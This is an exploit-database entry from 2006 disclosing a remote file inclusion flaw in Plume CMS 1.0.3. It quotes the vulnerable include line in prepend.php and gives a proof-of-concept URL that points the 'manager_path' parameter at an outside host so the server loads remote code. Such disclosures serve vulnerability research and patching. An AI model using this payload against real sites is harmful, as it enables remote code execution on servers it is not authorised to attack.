Plume CMS 1.0.3 - 'manager_path' Remote File Inclusion

Author: beford
type: webapps
platform: php
port: 
date_added: 2006-05-25  
date_updated: 2016-07-29  
verified: 1  
codes: OSVDB-23204;CVE-2006-2645;CVE-2006-0725  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.complume-1.0.3.zip  

raw file: 1832.txt  

Vendor: Plume CMS http://plume-cms.net
Vuln: Remote File Include
Discovered: beford <xbefordx gmail com>

Vulnerable File/Code

./plume-1.0.3/manager/frontinc/prepend.php

[code]
include_once $_PX_config['manager_path'].'/conf/config.php';
[/code]

http://urlanda.org/manager/frontinc/prepend.php?_PX_config[manager_path]=http://leet

# milw0rm.com [2006-05-26]